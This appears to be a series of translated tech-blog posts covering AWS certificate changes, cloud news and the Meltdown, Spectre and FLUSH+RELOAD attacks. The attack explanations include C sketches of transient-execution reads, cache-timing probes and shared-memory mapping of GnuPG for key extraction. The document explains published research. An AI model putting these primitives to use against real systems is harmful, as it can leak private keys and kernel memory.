
Amazon CloudWatch Logs Is Changing the CA for Its SSL Certificates

I received an email titled 「Upcoming Changes to SSL Certificates in Amazon CloudWatch Logs」, saying that Amazon CloudWatch Logs is changing the CA that issues its SSL certificates, apparently to Amazon's own:

We will be updating the certificate authority (CA) for the certificates used by Amazon CloudWatch Logs domain(s), between 8 January 2018 and 22 January 2018. After the updates complete, the SSL/TLS certificates used by Amazon CloudWatch Logs will be issued by Amazon Trust Services (ATS), the same certificate authority (CA) used by AWS Certificate Manager.

It also covers the cross-signing: the certificates are cross-signed through Starfield's root CAs, so as long as any one of the following is in the client's root CA store, the chain should be trusted:

The update means that customers accessing AWS webpages via HTTPS (for example, the Amazon CloudWatch Console, customer portal, or homepage) or accessing Amazon CloudWatch Logs API endpoints, whether through browsers or programmatically, will need to update the trusted CA list on their client machines if they do not already support any of the following CAs:
- "Amazon Root CA 1"
- "Starfield Services Root Certificate Authority - G2"
- "Starfield Class 2 Certification Authority"

It then lists which API endpoints are affected:

This upgrade notice covers the following endpoints:
logs.ap-northeast-1.amazonaws.com
logs.ap-northeast-2.amazonaws.com
logs.ap-south-1.amazonaws.com
logs.ap-southeast-1.amazonaws.com
logs.ap-southeast-2.amazonaws.com
logs.ca-central-1.amazonaws.com
logs.eu-central-1.amazonaws.com
logs.eu-west-1.amazonaws.com
logs.eu-west-2.amazonaws.com
logs.eu-west-3.amazonaws.com
logs.us-east-1.amazonaws.com
logs.us-east-2.amazonaws.com
logs.us-west-1.amazonaws.com
logs.us-west-2.amazonaws.com
logs.sa-east-1.amazonaws.com

It also lists which operating systems "should" already trust ATS:

* Operating Systems With ATS Support
- Microsoft Windows versions that have January 2005 or later updates installed, Windows Vista, Windows 7, Windows Server 2008, and newer versions
- Mac OS X 10.4 with Java for Mac OS X 10.4 Release 5, Mac OS X 10.5 and newer versions
- Red Hat Enterprise Linux 5 (March 2007), Linux 6, and Linux 7 and CentOS 5, CentOS 6, and CentOS 7
- Ubuntu 8.10
- Debian 5.0
- Amazon Linux (all versions)
- Java 1.4.2_12, Java 5 update 2, and all newer versions, including Java 6, Java 7, and Java 8

Windows XP isn't on the list, though. Not sure what that's about XD

Fortnite Apparently Doesn't Use Auto Scaling? (Or Didn't Set It Up Correctly?)

Fortnite's game servers run on AWS, and this wave of Meltdown security updates (KPTI) appears to be adding a very large overhead.

And it looks like that caused problems:

We wanted to provide a bit more context for the most recent login issues and service instability. All of our cloud services are affected by updates required to mitigate the Meltdown vulnerability. We heavily rely on cloud services to run our back-end and we may experience further service issues due to ongoing updates.

The most likely explanation is that they treat AWS as if it were an ordinary VPS provider; another possibility is that some internal services don't scale, so once KPTI landed and the overhead went up, everything got stuck...

Reading Time: How the Meltdown Attack Works

The Meltdown paper is available at 「Meltdown (PDF)」. The vulnerability hits Intel CPUs hardest, while AMD is unaffected. There are scattered reports about other platforms, but nothing like Intel, where essentially every CPU from the last fifteen years is affected... (Pentium 4 and everything after it.)

Meltdown relies on the following premises to dump memory from arbitrary addresses:

  • out-of-order execution on µOPs, plus a rollback mechanism for when the speculation turns out to be wrong.
  • side-channel information leaks caused by the cache.
  • the permission check on memory accesses not taking effect during out-of-order execution.

Out-of-order execution is covered in any undergraduate computer organization course, but as I remember it, the lecture only said "instructions are reordered only once they are confirmed to be independent". Modern CPUs go much further, in two ways:

  • First, the µOP approach: each assembly instruction is broken into finer micro-operations, and the out-of-order execution operates on those µOPs.
  • Second, the CPU may simply run ahead, and roll back if it later finds out it was wrong.

For example, the access() below should in theory never be executed, but modern out-of-order execution gives the CPU a chance to run the later instructions first; only after discovering they should never have been reached does it roll the register and memory state back:
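
A hedged C sketch of that pattern (access() is the name used above; probe_array, secret_ptr, and the rest are illustrative names of mine, not the paper's exact listing):

    static unsigned char probe_array[256 * 4096];   /* one cache line per possible byte value */

    /* access() only needs to touch the address; which line ends up cached is
     * the only thing the side channel later cares about. */
    static void access(volatile const unsigned char *p) { (void)*p; }

    void toy_example(const unsigned char *secret_ptr)
    {
        /* Architecturally the faulting read below ends the program (e.g. a
         * kernel address raises a page fault), so access() is "never reached"... */
        unsigned char secret = *secret_ptr;

        /* ...but an out-of-order core may already have executed it transiently,
         * leaving probe_array[secret * 4096] in the cache before the rollback. */
        access(&probe_array[secret * 4096]);
    }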

In that never-executed slot, Meltdown places a short Intel-syntax assembly sequence (the listing in the paper) built around a single privileged read.

That read, mov al, byte [rcx], should be subject to a memory check confirming whether the user is allowed to access that address. But because even the memory check is split into µOPs and runs in parallel, a race condition appears:

Meltdown is some form of race condition between the fetch of a memory address and the corresponding permission check for this address.

As a result, the code that should never run gets to load the data into the al register first, and then uses that value to access a memory location, which pulls a specific cache line into the cache.

Once the cache contents have changed, the FLUSH+RELOAD technique (a side channel) reveals which block the code touched (see my earlier post 「The FLUSH+RELOAD Technique Used by Both Meltdown and Spectre」), which is enough to deduce the value of al...
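
Concretely, recovering al means timing a reload of each of the 256 candidate cache lines in the probe array and picking the one that comes back fastest. A hedged sketch of that loop (x86-specific, using GCC's __rdtscp intrinsic; probe_array and the assumption that exactly one of its lines is hot are carried over from the sketch above):

    #include <stdint.h>
    #include <x86intrin.h>

    static unsigned char probe_array[256 * 4096];   /* the array the transient code touched */

    /* Time a single load of *p in cycles (rdtscp also orders the load). */
    static uint64_t timed_load(volatile const unsigned char *p)
    {
        unsigned aux;
        uint64_t start = __rdtscp(&aux);
        (void)*p;
        return __rdtscp(&aux) - start;
    }

    /* Assumes the transient code has just run and exactly one probe line is hot. */
    int recover_byte(void)
    {
        int best = -1;
        uint64_t best_time = UINT64_MAX;

        for (int value = 0; value < 256; value++) {
            uint64_t t = timed_load(&probe_array[value * 4096]);
            if (t < best_time) { best_time = t; best = value; }
        }
        return best;   /* in the ideal case this is the leaked al value */
    }

Real proof-of-concept code usually also flushes the probe array beforehand and walks it in a non-sequential order so the hardware prefetcher does not drag neighbouring lines into the cache and skew the timing.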

For the mov al, byte [rcx] to work, Meltdown needs one more thing: [rcx] itself. Even if the access skips the permission check, shouldn't the virtual-to-physical address translation fail?

It doesn't, because Linux and OS X have a direct-physical map: the entire physical memory is mapped into a fixed region of virtual address space, those addresses are never handed out to user space, and so the translation goes through:

On Linux and OS X, this is done via a direct-physical map, i.e., the entire physical memory is directly mapped to a pre-defined virtual address (cf. Figure 2).

Windows is more complicated, but most of physical memory is still mapped into the kernel address space, and every process still contains the full kernel address space (just gated by permissions), so the Meltdown attack still works:

Instead of a direct-physical map, Windows maintains a multiple so-called paged pools, non-paged pools, and the system cache. These pools are virtual memory regions in the kernel address space mapping physical pages to virtual addresses which are either required to remain in the memory (non-paged pool) or can be removed from the memory because a copy is already stored on the disk (paged pool). The system cache further contains mappings of all file-backed pages. Combined, these memory pools will typically map a large fraction of the physical memory into the kernel address space of every process.

This is also the principle behind the 「Kernel page-table isolation」 workaround patch (the name pretty much gives away the approach): splitting the kernel and user mappings apart cuts off Meltdown's attack path.

AMD's hardware, on the other hand, does not defer the permission check for mov al, byte [rcx] into out-of-order execution, which removes a crucial link in the Meltdown attack.

CloudFront Is Up to Seven Edge Locations in Tokyo...

In 「Amazon CloudFront announces six new Edge Locations, adding two more in Tokyo, JP, and its first location in Perth, AU」, Amazon CloudFront adds two edge locations in Tokyo at once, bringing the city to seven:

Amazon CloudFront announces six new Edge Locations that are now part of its global network. These six new Edge Locations are located in the following cities:

Perth, Australia; Chennai, India; Rio De Janeiro, Brazil; Los Angeles, California; and two additional Edge Locations in Tokyo, Japan.

On top of that there is another edge location in Osaka. Is traffic in Japan really that heavy? Or does it have something to do with Regional Edge Caches...

The FLUSH+RELOAD Technique Used by Both Meltdown and Spectre

FLUSH+RELOAD is a technique used in both the Meltdown and Spectre attacks. It comes from the 2013 paper 「Flush+Reload: a High Resolution, Low Noise, L3 Cache Side-Channel Attack」, which at the time also resulted in CVE-2013-4242 being issued against GnuPG.

FLUSH+RELOAD extracts side-channel information through shared memory and the cache, and uses it to defeat security mechanisms.

The paper describes two attack scenarios: one inside a single OS (same-OS), and one on the same machine but across two different VMs (cross-VM). The prerequisite is getting memory that is shared with the GnuPG process, and in both environments that is done by mmap()-ing the GnuPG executable, as sketched below.
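
A hedged sketch of that mmap() step from the spy's side (the /usr/bin/gpg path is just an assumption for illustration): a read-only file mapping is enough, because the kernel's page cache, or the hypervisor's page de-duplication in the cross-VM case, ends up backing both processes with the same physical pages.

    #include <fcntl.h>
    #include <stdio.h>
    #include <sys/mman.h>
    #include <sys/stat.h>
    #include <unistd.h>

    int main(void)
    {
        const char *victim_binary = "/usr/bin/gpg";   /* assumed path to the GnuPG binary */

        int fd = open(victim_binary, O_RDONLY);
        if (fd < 0) { perror("open"); return 1; }

        struct stat st;
        if (fstat(fd, &st) < 0) { perror("fstat"); return 1; }

        /* A read-only, private mapping of the executable: the spy never writes
         * to it, so the physical pages stay shared with the running victim. */
        unsigned char *image = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
        if (image == MAP_FAILED) { perror("mmap"); return 1; }

        printf("mapped %lld bytes of %s at %p\n",
               (long long)st.st_size, victim_binary, (void *)image);

        /* image + <offset of the code being watched> is what FLUSH+RELOAD probes. */
        munmap(image, st.st_size);
        close(fd);
        return 0;
    }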

In the same-OS case, the spy and the victim end up sharing the memory image of the same executable file:

To achieve sharing, the spy mmaps the victim’s executable file into the spy’s virtual address space. As the Linux loader maps executable files into the process when executing them, the spy and the victim share the memory image of the mapped file.

In the cross-VM case, the shared memory comes from the hypervisor de-duplicating identical pages:

For the cross-VM scenario we used two different hypervisors: VMware ESXi 5.1 on the HP machine and Centos 6.5 with KVM on the Dell machine. In each hypervisor we created two virtual machines, one for the victim and the other for the spy. The virtual machines run CentOS 6.5 Linux. In this scenario, the spy mmaps a copy of the victim’s executable file. Sharing is achieved through the page de-duplication mechanisms of the hypervisors.

From there the cache does the rest. The basic principle is: access a piece of memory, measure how long the access takes, and you can tell whether it was served from L1, L2, L3, or main memory. FLUSH+RELOAD is therefore built around three phases:

  • During the first phase, the monitored memory line is flushed from the cache hierarchy.
  • The spy, then, waits to allow the victim time to access the memory line before the third phase.
  • In the third phase, the spy reloads the memory line, measuring the time to load it.

First flush the memory line you want to observe (with clflush), wait a short while, then scan the memory lines and use the timing to learn which ones were accessed in the meantime (they will come back faster). This is tied to the cache architecture: you can't spy on more data than the cache can hold (it would simply get evicted), so you normally watch only the key locations.
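
A hedged sketch of one flush / wait / reload round on a single monitored line, using the _mm_clflush and __rdtscp intrinsics; the 100-cycle hit threshold and the 100 µs wait are ballpark values I picked for illustration, not numbers from the paper:

    #include <stdint.h>
    #include <unistd.h>
    #include <x86intrin.h>

    #define HIT_THRESHOLD 100   /* cycles; a ballpark value, calibrate per machine */

    /* One FLUSH+RELOAD round on a single monitored address inside the shared
     * mapping.  Returns 1 if the victim touched the line during the wait. */
    int flush_reload(const unsigned char *line)
    {
        unsigned aux;

        _mm_clflush(line);                         /* phase 1: evict the line */

        usleep(100);                               /* phase 2: let the victim run */

        uint64_t start = __rdtscp(&aux);           /* phase 3: reload and time it */
        (void)*(volatile const unsigned char *)line;
        uint64_t elapsed = __rdtscp(&aux) - start;

        return elapsed < HIT_THRESHOLD;            /* fast reload => victim brought it back */
    }

In the GnuPG attack, line points at addresses inside the mmap()-ed executable image that correspond to the code being watched, and the hit/miss pattern over many rounds is what reveals the execution sequence.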

Next comes attacking GnuPG. The starting point is the code GnuPG runs when computing with the RSA private key.

After picking good locations to watch based on that code, the attack starts collecting measurements, which can be plotted over time.

The execution order can then be read off from those measurements.

Following the execution order, the RSA key can be reconstructed. In the actual tests, a single decrypt or sign operation was enough to recover most of the key (96.7%):

We demonstrate the efficacy of the FLUSH+RELOAD attack by using it to extract the private encryption keys from a victim program running GnuPG 1.4.13. We tested the attack both between two unrelated processes in a single operating system and between processes running in separate virtual machines. On average, the attack is able to recover 96.7% of the bits of the secret key by observing a single signature or decryption round.

Once you know this technique, reading Meltdown or Spectre makes it clear why they use FLUSH+RELOAD... (both papers only mention it in passing)

Intel's CEO Is Doing Great XDDD

He sold his Intel stock down to the bare minimum one month before everything blew up XDDD: 「Intel was aware of the chip vulnerability when its CEO sold off $24 million in company stock」, which cites 「Intel's CEO Just Sold a Lot of Stock」:

On Nov. 29, Brian Krzanich, the CEO of chip giant Intel (NASDAQ:INTC), reported several transactions in Intel stock in a Form 4 filing with the SEC.

So he sold at the end of November... keeping only the 250,000 shares a CEO is required to hold at minimum:

Those two transactions left Krzanich with exactly 250,000 shares -- the bare minimum that he's required to hold as CEO.

Let's see whether the profits get clawed back XDDD

A Taiwan–US Tax Treaty (Still Being Negotiated)

Saw the news item 「因應美稅改 賴揆:加速洽簽台美租稅協定」 (Premier Lai: speed up negotiating a Taiwan–US tax treaty in response to US tax reform). If I remember correctly, quite a few services bill from US companies... (services like AWS, Slack, and GitHub that are heavily used inside companies)

Based on the table in 「我國股利、利息及權利金扣繳率(%)一覽表」 (the schedule of withholding rates on dividends, interest, and royalties), the rate could probably drop from 20% to 10%? That is, for an actual payment of NT$1,000,000 you currently have to pay an extra NT$250,000 (book it as 1,000,000 / (1 - 0.2) = 1,250,000, of which 20%, i.e. 250,000, is withholding tax and 1,000,000 is what actually gets paid out), whereas it would become only about NT$111,000 (1,000,000 / (1 - 0.1) ≈ 1,111,000)?
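
The gross-up arithmetic in those parentheses, written out as a tiny example (the NT$1,000,000 net amount and the two rates are the ones from the paragraph above; this is just arithmetic, not tax advice):

    #include <stdio.h>

    int main(void) {
        double net = 1000000.0;          /* amount the vendor actually receives */
        double rates[] = {0.20, 0.10};   /* withholding rate before / after a treaty */

        for (int i = 0; i < 2; i++) {
            double gross = net / (1.0 - rates[i]);   /* amount booked */
            double tax = gross - net;                /* withholding paid to the tax office */
            printf("rate %.0f%%: gross %.0f, withholding %.0f\n",
                   rates[i] * 100, gross, tax);
        }
        return 0;
    }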

That said, some special cases already enjoy better tax treatment (for example, using a foreign platform (e.g. AWS) to provide services whose users are also outside the country), so it's worth studying how these combinations can be arranged...

psgo_emitter, a Tool for Producing Go Diagrams in TeX

I forget where I ran into avysk/psgo_emitter, a tool that emits TeX (psgo) markup for Go board diagrams, although the description says it only supports Windows:

psgo_emitter is a (Windows) console utility to create go diagrams for go life-and-death problems (tsumego).

It can render just a corner of the board; for example, this markup:

    \begin{psgopartialboard}{(1,1)(8,6)}
            \stone{black}{b}{3}
            \stone{black}{d}{3}
            \stone{black}{b}{4}
            \stone{white}{d}{5}
            \stone{white}{g}{2}
            \stone{black}{d}{2}
            \stone{white}{b}{5}
            \stone{white}{c}{4}
            \stone{white}{e}{4}
            \stone{white}{e}{3}
            \stone{white}{e}{2}
            \stone{black}{e}{1}
    \end{psgopartialboard}

produces the corresponding corner-of-the-board diagram.

Move numbers can also be included:

    \begin{psgopartialboard}{(1,1)(8,6)}
            \stone{black}{b}{3}
            \stone[\marklb{1}]{black}{a}{2}
            \stone{black}{d}{3}
            \stone{black}{b}{4}
            \stone[\marklb{8}]{white}{f}{1}
            \stone[\marklb{6}]{white}{d}{1}
            \stone{white}{e}{2}
            \stone{white}{g}{2}
            \stone{black}{d}{2}
            \stone{white}{b}{5}
            \stone[\marklb{7}]{black}{b}{2}
            \stone[\marklb{9}]{black}{a}{1}
            \stone{white}{c}{4}
            \stone[\marklb{4}]{white}{c}{2}
            \stone{white}{e}{4}
            \stone[\marklb{5}]{black}{c}{3}
            \stone{white}{e}{3}
            \stone[\marklb{2}]{white}{b}{1}
            \stone{white}{d}{5}
            \stone[\marklb{3}]{black}{a}{4}
            \stone{black}{e}{1}
    \end{psgopartialboard}

which renders the same position with the numbered move sequence.

The tool is still very new; we'll see how it develops...

Linus Is (Once Again) Annoyed... XD

You can tell Linus is quite unhappy with Intel's behavior: 「Re: Avoid speculative indirect calls in kernel」.

Please talk to management. Because I really see exactly two possibibilities:

 - Intel never intends to fix anything

OR

 - these workarounds should have a way to disable them.

Which of the two is it?

That "possibibilities" is presumably a typo, but somehow it reads just right XDDD

Spectre and Meltdown, Two Sets of CPU Security Vulnerabilities

The Register published 「Kernel-memory-leaking Intel processor design flaw forces Linux, Windows redesign」, a fairly complete explanation of the vulnerabilities (by IT news media standards) that cites quite a few sources and tries to explain the problem.

That made the whole story develop and spread faster than planned, so Google's Project Zero published Spectre and Meltdown, the two sets of CPU security vulnerabilities, ahead of schedule. Their writeup is very long and even more complete than The Register's piece: 「Reading privileged memory with a side-channel」.

The Google Project Zero article splits the vulnerabilities into three variants, one per CVE:

  • Variant 1: bounds check bypass (CVE-2017-5753)
  • Variant 2: branch target injection (CVE-2017-5715)
  • Variant 3: rogue data cache load (CVE-2017-5754)

The first two are called Spectre and were independently discovered and reported to the vendors by three teams: Google Project Zero, Cyberus Technology, and Graz University of Technology. The last one is called Meltdown, independently discovered and reported by Google Project Zero and one other team.

Both sets of vulnerabilities have an "official site"; the URLs differ but the content is identical: spectreattack.com and meltdownattack.com.

The impact covers Intel, AMD, and ARM. Because of its different architecture, AMD is only affected in specific situations (only when the user has enabled the eBPF JIT themselves):

(On the Variant 1 case) If the kernel's BPF JIT is enabled (non-default configuration), it also works on the AMD PRO CPU.

These holes mainly read memory contents through side-channel information (with some constraints). The painful part is that fixing Meltdown carries a huge CPU performance penalty; for the Linux fix see 「KAISER: hiding the kernel from user space」, which notes:

KAISER will affect performance for anything that does system calls or interrupts: everything. Just the new instructions (CR3 manipulation) add a few hundred cycles to a syscall or interrupt. Most workloads that we have run show single-digit regressions. 5% is a good round number for what is typical. The worst we have seen is a roughly 30% regression on a loopback networking test that did a ton of syscalls and context switches.

KAISER was later renamed KPTI, something to keep in mind when searching for information.
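
As a side note, kernels that ship the sysfs vulnerability reporting (it appeared around 4.15, so treat the path as an assumption on older distro kernels) let you check whether PTI is active; a minimal sketch:

    #include <stdio.h>

    int main(void)
    {
        /* Present on kernels with sysfs vulnerability reporting (roughly 4.15+);
         * prints e.g. "Mitigation: PTI" or "Vulnerable". */
        const char *path = "/sys/devices/system/cpu/vulnerabilities/meltdown";
        char line[256];

        FILE *f = fopen(path, "r");
        if (!f) {
            fprintf(stderr, "%s not available on this kernel\n", path);
            return 1;
        }
        if (fgets(line, sizeof(line), f))
            printf("meltdown status: %s", line);
        fclose(f);
        return 0;
    }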

The numbers above are for physical machines. Inside a VM you can expect even more syscalls and context switches, and indeed Phoronix's tests show the performance loss in VMs is much larger than on bare metal (it still depends on the workload, mostly on how many syscalls and context switches it generates): 「VM Performance Showing Mixed Impact With Linux 4.15 KPTI Patches」.

With these VM results so far it's still a far cry from the "30%" performance hit that's been hyped up by some of the Windows publications, etc. It's still highly dependent upon the particular workload and system how much performance may be potentially lost when enabling page table isolation within the kernel.

This is not good news for the cloud providers: with a performance hit this big they can hardly just force the KPTI patch on... especially the VPS providers, who routinely oversubscribe; for them KPTI doesn't look like a workable option.

You can see the VPS providers have all issued PR statements already (a press release saying "we are aware of it", without offering a solution yet): 「CPU Vulnerabilities: Meltdown & Spectre (Linode)」, 「A Message About Intel Security Findings (DigitalOcean)」, 「Intel CPU Vulnerability Alert (Vultr)」.

We can expect more people to dig into how to defend against these two sets of vulnerabilities with a smaller performance penalty; for now, all we can do is wait...
